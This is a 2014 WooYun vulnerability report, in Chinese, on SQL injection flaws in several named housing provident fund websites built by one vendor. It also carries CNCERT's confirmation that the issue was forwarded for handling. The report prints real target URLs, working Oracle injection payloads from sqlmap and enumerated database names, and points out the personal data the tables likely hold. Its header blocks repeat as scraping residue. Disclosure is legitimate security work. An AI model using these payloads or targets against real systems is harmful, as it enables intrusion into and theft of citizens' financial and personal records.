某住房公积金系统存在多处SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070942

漏洞标题：某住房公积金系统存在多处SQL注入漏洞

漏洞作者：浮萍

提交时间：2014-08-04 12:02

修复时间：2014-11-02 12:04

公开时间：2014-11-02 12:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-04：细节已通知厂商并且等待厂商处理中
2014-08-08：厂商已经确认，细节仅向厂商公开
2014-08-11：细节向第三方安全合作伙伴开放
2014-10-02：细节向核心白帽子及相关领域专家公开
2014-10-12：细节向普通白帽子公开
2014-10-22：细节向实习白帽子公开
2014-11-02：细节向公众公开

简要描述：

住房公积金貌似有很多个人信息吧

详细说明：

今天提交了一个SQL注入的漏洞
发现了这个“技术支持：长达科技”
就百度了一下

3个还都是公积金网站
先去看看

可是别的两个网站没有search.aspx
又发现一个地方

这么少肯定不够呀
然后看友情链接这里

一个一个点进去看看

果然还是长达科技

暂时就这几处吧

漏洞证明：

http://www.esgjj.cn/Search.aspx?ArticleTitle=0
http://www.ysgjj.com/User/Search.aspx?key=a
http://www.hggjj.cn/User/Search.aspx?key=a
http://www.esgjj.cn/Messages.aspx
http://www.syjyzfgjj.com/Messages.aspx
http://www.ymgjj.com/Messages.aspx
http://www.esgjj.cn/Search.aspx?ArticleTitle=0

---
Place: GET
Parameter: ArticleTitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ArticleTitle=0%' AND 3476=3476 AND '%'='
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: ArticleTitle=0%' AND 4608=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(102)||CHR(98)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4608=4608) T
HEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(116)||CHR(113)||CHR(113)||
CHR(62))) FROM DUAL) AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ArticleTitle=0%' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(86
)||CHR(115)||CHR(120),5) AND '%'='
---

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle

available databases [25]:
[*] AAA
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ES20140417
[*] ESGJJ20130108
[*] ESGJJWZ
[*] ESWZ
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] QTZFZJ
[*] SCOTT
[*] SJ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WJXX
[*] WMSYS
[*] XDB
[*] ZFGJJ

http://www.ysgjj.com/User/Search.aspx?key=a

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=a%' AND 1219=1219 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: key=a%' AND 5934=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(88)||CHR(85
)||CHR(89),5) AND '%'='
---

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle

http://www.hggjj.cn/User/Search.aspx?key=a

GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 64 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=a%' AND 1201=1201 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: key=a%' AND 8613=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(101)||CHR(1
06)||CHR(70),5) AND '%'='
---

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle

http://www.syjyzfgjj.com/Messages.aspx
post注入
我一般喜欢get
通过抓包
返回拼写url地址

http://www.syjyzfgjj.com/Messages.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEPZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4LXyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K%2BJBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMPDxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUeB0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP%2FuAx69UCrjVkzDVCxk%3D&__EVENTVALIDATION=%2FwEWFwLynYiqBALPlaOYDgL0waHFBgL0%2BY6SCQKPo4%2FEBwL%2Fi9q%2BAgKZ%2FYHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl%2BYmoCgLQqZ3FDQKa9f%2FvDAKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR%2BMaa%2BSB3kMxDFC38h2e3JXZyX&ctl00%24ContentPlaceHolder1%24ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00%24ContentPlaceHolder1%24ddlReply=%E5%85%A8%E9%83%A8&ctl00%24ContentPlaceHolder1%24txtStart=&ctl00%24ContentPlaceHolder1%24txtEnd=&ctl00%24ContentPlaceHolder1%24ddlTitle=title&ctl00%24ContentPlaceHolder1%24txtTitle=a*&ctl00%24ContentPlaceHolder1%24btnSelect=%E6%9F%A5%E8%AF%A2&ctl00%24ContentPlaceHolder1%24ddlSize=12

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://www.syjyzfgjj.com:80/Messages.aspx?__EVENTTARGET=&__EVENTARG
UMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEP
ZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4L
XyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K+JBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2
OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3
QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMP
DxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUe
B0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP/uAx69UCrjV
kzDVCxk=&__EVENTVALIDATION=/wEWFwLynYiqBALPlaOYDgL0waHFBgL0+Y6SCQKPo4/EBwL/i9q+A
gKZ/YHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl+YmoCgLQqZ3FDQKa9f/vD
AKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR+Maa+SB3kMxDFC38h2e3JX
ZyX&ctl00$ContentPlaceHolder1$ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00$Con
tentPlaceHolder1$ddlReply=%E5%85%A8%E9%83%A8&ctl00$ContentPlaceHolder1$txtStart=
&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$ddlTitle=title&ctl0
0$ContentPlaceHolder1$txtTitle=a' AND 6479=(SELECT UPPER(XMLType(CHR(60)||CHR(58
)||CHR(113)||CHR(106)||CHR(113)||CHR(104)||CHR(113)||(SELECT (CASE WHEN (6479=64
79) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(107)||CHR(105)||CHR(1
13)||CHR(62))) FROM DUAL) AND 'HWcQ'='HWcQ&ctl00$ContentPlaceHolder1$btnSelect=%
E6%9F%A5%E8%AF%A2&ctl00$ContentPlaceHolder1$ddlSize=12
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: http://www.syjyzfgjj.com:80/Messages.aspx?__EVENTTARGET=&__EVENTARG
UMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEP
ZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4L
XyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K+JBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2
OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3
QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMP
DxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUe
B0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP/uAx69UCrjV
kzDVCxk=&__EVENTVALIDATION=/wEWFwLynYiqBALPlaOYDgL0waHFBgL0+Y6SCQKPo4/EBwL/i9q+A
gKZ/YHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl+YmoCgLQqZ3FDQKa9f/vD
AKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR+Maa+SB3kMxDFC38h2e3JX
ZyX&ctl00$ContentPlaceHolder1$ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00$Con
tentPlaceHolder1$ddlReply=%E5%85%A8%E9%83%A8&ctl00$ContentPlaceHolder1$txtStart=
&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$ddlTitle=title&ctl0
0$ContentPlaceHolder1$txtTitle=a' AND 6310=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CH
R(115)||CHR(83)||CHR(87),5)--&ctl00$ContentPlaceHolder1$btnSelect=%E6%9F%A5%E8%A
F%A2&ctl00$ContentPlaceHolder1$ddlSize=12
---

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle

available databases [20]:
[*] CTXSYS
[*] CW
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SMS
[*] SYGJJWZ
[*] SYS
[*] SYSJ
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZFGJJ

最后一个数据库ZFGJJ=住房公积金
然后看看表有359个
还有一个就不贴了
住房公积金貌似有很多个人信息吧

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-08-08 16:21

厂商回复：

CNVD确认并复现所述漏洞情况，根据测试用例，已经转由CNCERT下发给湖北分中心，由湖北分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070942

漏洞标题：某住房公积金系统存在多处SQL注入漏洞

相关厂商：长达科技

漏洞作者：浮萍

提交时间：2014-08-04 12:02

修复时间：2014-11-02 12:04

公开时间：2014-11-02 12:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070942

漏洞标题：某住房公积金系统存在多处SQL注入漏洞

相关厂商：长达科技

漏洞作者： 浮萍

提交时间：2014-08-04 12:02

修复时间：2014-11-02 12:04

公开时间：2014-11-02 12:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-070942"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浮萍@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：浮萍

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源浮萍@乌云